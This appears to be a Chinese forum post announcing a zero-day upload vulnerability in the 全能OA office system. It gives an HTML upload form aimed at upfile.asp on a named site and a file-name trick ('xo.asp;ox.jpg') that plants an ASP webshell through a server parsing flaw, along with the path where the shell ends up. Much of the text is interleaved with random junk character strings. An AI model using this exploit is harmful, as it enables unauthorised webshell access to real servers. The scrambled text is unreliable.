全能OA办公系统0day OA办公系统漏洞 上传漏洞

admin

全能OA办公系统 上传漏洞
​
系统介绍：

* l2 A2 n4 R' A/ N, z0 V% e8 x1 O2 b全能OA办公系统2012是功能非常强大的OA系统，目前功能已完全能满足日常办公需要。

主要功能：
* X3 E8 r/ `; l' W! c公司通告
工作计划
通讯助理
# a0 M) z* }# s6 P8 f) i9 X2 w客户资源
我的公文
0 n/ k2 E6 L$ v. m公文传阅
9 x* F. D" y' U6 N! U公共资源
资源预约
0 k  s! M1 ?3 O今日考勤
个人计划
/ u$ {- w) z" o5 B个人通讯录
个人基本档案
8 A  Q, S& ^' D' X7 U0 ]: X) h未读邮件
/ _+ P8 u3 ?& z) O9 u  |% O发邮件
收件夹
寄件夹
( X6 w( |4 c$ n; O) ^$ Z网络硬盘
- e" a" _8 `: k* e! a0 Z# K, w* N: y网络会议
0 U6 ?# C% L8 @; W8 W( U3 W- u网络调查
交流论坛
: Q4 e' i- @8 [* @; U1 R/ Z# ?
- `0 T. q; X6 i+ ?% }9 d! @$ O有兴趣测试的朋友可以下源码看看
3 W8 h" X7 n- ^; F1 z
源码下载：

! L2 J# w6 o5 W, t& E6 i# F, whttp://www.mycodes.net/30/4750.htm
( h- r) F' `+ o& i3 w+ V0 G  w
6 N" {: ~( [) y+ M漏洞介绍：

; N+ v- V# R- f& \9 w$ ~由upfile.asp上传文件漏洞引起
2 ^+ |! o: D9 y9 E% w6 f0 o! Q( O! F
% T( j1 E) l- Y* x; d2 E测试方法：

使用名小子上传http://www.itlynn.com/upfile.asp即可

4 H- n. U% t. i9 K9 n! X如果upfile.asp文件被删除不存在。

  那么可以试着访问http://www.itlynn.com/upfile/upfile.asp 。

如果存在那么将如下代码保存为upfile.html。

. g6 F/ v: r, V! y; ^然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp。
* s/ ?8 O2 }, c$ E


' ^" H' M% j; j01 <table border='0' align="center" cellpadding="5">

02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1">
4 c, U$ Z# Y1 Q4 S; n( q$ O* z
03 <tr>
! j2 q3 Q+ c" ~, R0 }! r1 R/ y; O8 a
04             <td>报错：</td>
: }2 a  h3 B6 V; W% L. Q. e/ I
3 U  b. \; Q$ I# K05             <td><input type='radio' name='errnumber' value='0'>
% G8 C/ |1 T2 i8 M9 l8 E: w
. B2 t4 E+ ^) A) O2 T1 B! Q06               自动更名

07               <input type='radio' name='errnumber' value='1' checked>
* e( _: ~& _3 T' n+ B, H( `7 ?
08               报错方式
( z+ q9 Y# N7 D$ c) E; i; U' H9 c
7 d3 I) e7 _  ?/ l. n09               <input type='radio' name='errnumber' value='2'>

10               直接覆盖</td>
; v# X3 W; ]; J' y
11           </tr>

  P( K, b: [; n2 A. i+ g/ J12           <tr>

! m; |+ N2 c: @$ u- I5 z1 `13             <td>主题：</td>

14             <td><input type='text' name='filename' size='30'></td>

15           </tr>

3 g/ B' S1 o) s8 \7 [6 o% g16           <tr>

17             <td>文件：</td>

18             <td><input type="file"name="fruit"size="30"></td>
1 g# t9 F4 N' n0 W- @. x& y; H  d$ Q
19           </tr>

20           <tr>

21             <td valign='top'>简介：</td>

22             <td><textarea name='fileExt' cols='40' rows='5'></textarea></td>
1 ^% g2 ~' U! S% d. C4 k
23           </tr>
2 L5 O  U* h6 m" ]* i0 I' _
24   
6 W, ?2 ^; s+ c
+ F! b$ o: |: b25             <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td>
8 o3 k5 ?4 a0 X; E/ h5 ^- S* ]
( \/ i! u- [, W# Q& h26           </tr>
+ M6 \6 x" y, t+ S
- {2 Y8 C2 i# i0 r  F% P8 Y: [27         </form>
  z( x2 f, q) }
8 q8 h" u! V1 h, f3 Y/ O1 l4 M6 D然后打开上传一个文件名为xo.asp;ox.jpg的文件。

8 l7 b, v9 S& [# a( |6 f  H; L; j

上传成功后，马的路径是：http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg
0 T: C9 B" H/ Q/ `( M+ h  W  U
此漏洞需要配合解析漏洞利用。
( X" S- Z$ N2 b3 ~5 p5 l2 P' z